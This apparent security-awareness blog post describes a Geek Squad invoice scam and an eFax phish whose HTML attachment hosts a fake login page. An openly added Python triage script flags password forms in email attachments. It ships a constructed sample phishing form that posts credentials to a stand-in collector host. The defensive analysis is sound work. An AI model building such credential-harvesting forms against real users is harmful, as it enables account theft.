Friday Phish Fry

Phishing Email Alerts

Catch of the Day: eFax Phish
Chef’s Special: Geek Squad phish

Examples of clever phish that made it past my spam filters and into my inbox. Some are sent by clients or readers like you, and others come from reliable sources on the Internet.

You can send phishing samples to me at phish@wyzguys.com.

My intention is to provide a warning and show current examples of phishing scams, related articles, and education about how these scams and exploits work, and how to detect them in your inbox. If the pictures are too small or extend off the page, double clicking the image will display them in a photo viewer app.


Geek Squad Phish

I love it when I get renewal notices from the Geek Squad. It reminds me of the scene in the Princess Bride when Fezzik says “I’m on the Brute Squad,” and Miracle Max looks at him and says “You are the Brute Squad.” I am the Geek Squad. Computer repair is what I’ve been doing for 20 years. This is another “call the 800 number” exploit. Just don’t. You owe nothing to the Geek Squad, and if you did, paying this invoice would not square your debt.

 


eFax Phish

I received this “eFax” notice. Evidently there is a “paystub” (money) which is the lure on this attack. The HTML attachment tells me that this exploit will use the self-hosted web page exploit at some point. Let’s play. Here’s the email.

The email headers show that this email came from the United Kingdom by way of South Africa. This is a very convoluted set of headers, and I am not sure what all the steps through the loopback address 127.0.0.1 are about.

 

I downloaded the attachment to see what I would find.

 

Sure enough, a self-hosted login landing page.  I entered the usual fake password.

And was redirected to a most unusual and totally genuine Microsoft sign-in error message page.

I sent the attachment to VirusTotal, and at the date of this exploit, 2022-06-19, this was not yet flagged by any security vendor.

This was definitely a credential-stealing exploit, but for what cloud service or account I have no idea. Microsoft? Not positive about that, but most likely.
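A static check a defender could run on a message like this one without opening the attachment in a browser, added here as an example and not taken from the original post. It flags HTML attachments that contain a password field and lists any hosts the form would submit to. The sample message, the host names and the function names are constructed for illustration.

```python
from email import message_from_bytes, policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormScan(HTMLParser):
    """Count password inputs and collect form targets in one HTML document."""

    def __init__(self):
        super().__init__()
        self.password_fields, self.actions = 0, []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_fields += 1
        elif tag == "form":
            self.actions.append(a.get("action") or "")


def triage_html_attachments(raw: bytes) -> list:
    """Return a finding for every HTML attachment that asks for a password."""
    findings = []
    for part in message_from_bytes(raw, policy=policy.default).iter_attachments():
        name = part.get_filename() or ""
        if part.get_content_type() != "text/html" and not name.lower().endswith((".htm", ".html")):
            continue
        body = part.get_payload(decode=True) or b""
        scan = FormScan()
        scan.feed(body.decode(part.get_content_charset() or "utf-8", "replace"))
        if scan.password_fields:  # a login form has no business inside an attachment
            # Script-driven pages may not declare a target, so hosts can be empty.
            hosts = sorted({urlparse(u).hostname for u in scan.actions if urlparse(u).hostname})
            findings.append({"filename": name, "password_fields": scan.password_fields, "post_hosts": hosts})
    return findings


def constructed_sample() -> bytes:
    """Constructed message: a fake fax notice carrying a login form as an attachment."""
    html = ('<html><body><form action="https://collector.example/log" method="post">'
            '<input type="email" name="u"><input type="password" name="p">'
            '</form></body></html>')
    m = EmailMessage()
    m["From"], m["Subject"] = "fax@sender.example", "New fax: paystub"
    m.set_content("You have received a new fax.")
    m.add_attachment(html, subtype="html", filename="paystub.html")
    return m.as_bytes()
```

Calling `triage_html_attachments(constructed_sample())` returns one finding for `paystub.html`; an empty `post_hosts` list on a flagged attachment still warrants review because the password field alone is the signal.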



About the Author:

I am a cybersecurity and IT instructor, cybersecurity analyst, pen-tester, trainer, and speaker. I am an owner of the WyzCo Group Inc. In addition to consulting on security products and services, I also conduct security audits, compliance audits, vulnerability assessments and penetration tests. I also teach Cybersecurity Awareness Training classes. I work as an information technology and cybersecurity instructor for several training and certification organizations. I have worked in corporate, military, government, and workforce development training environments. I am a frequent speaker at professional conferences such as the Minnesota Bloggers Conference, Secure360 Security Conference in 2016, 2017, 2018, 2019, the (ISC)2 World Congress 2016, and the ISSA International Conference 2017, and many local community organizations, including Chambers of Commerce, SCORE, and several school districts. I have been blogging on cybersecurity since 2006 at http://wyzguyscybersecurity.com
